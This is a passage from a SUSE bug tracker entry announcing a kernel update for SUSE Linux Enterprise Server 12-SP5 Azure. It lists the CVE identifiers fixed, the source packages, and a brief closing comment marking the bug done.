,1159096,1159297,1159483,1159484,1159500,1159569,1159841,1159908,1159909,1159910,972655
CVE References: CVE-2017-18595,CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-14821,CVE-2019-14835,CVE-2019-14895,CVE-2019-14901,CVE-2019-15030,CVE-2019-15031,CVE-2019-15213,CVE-2019-15916,CVE-2019-16231,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16746,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18660,CVE-2019-18683,CVE-2019-18805,CVE-2019-18808,CVE-2019-18809,CVE-2019-19046,CVE-2019-19049,CVE-2019-19051,CVE-2019-19052,CVE-2019-19056,CVE-2019-19057,CVE-2019-19058,CVE-2019-19060,CVE-2019-19062,CVE-2019-19063,CVE-2019-19065,CVE-2019-19066,CVE-2019-19067,CVE-2019-19068,CVE-2019-19073,CVE-2019-19074,CVE-2019-19075,CVE-2019-19077,CVE-2019-19078,CVE-2019-19080,CVE-2019-19081,CVE-2019-19082,CVE-2019-19083,CVE-2019-19227,CVE-2019-19319,CVE-2019-19332,CVE-2019-19338,CVE-2019-19447,CVE-2019-19523,CVE-2019-19524,CVE-2019-19525,CVE-2019-19526,CVE-2019-19527,CVE-2019-19528,CVE-2019-19529,CVE-2019-19530,CVE-2019-19531,CVE-2019-19532,CVE-2019-19533,CVE-2019-19534,CVE-2019-19535,CVE-2019-19536,CVE-2019-19537,CVE-2019-19543,CVE-2019-19767,CVE-2019-19966,CVE-2019-20054,CVE-2019-20095,CVE-2019-20096,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.7.1, kernel-source-azure-4.12.14-16.7.1, kernel-syms-azure-4.12.14-16.7.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 71 Marcus Meissner 2020-02-05 07:54:10 UTC

done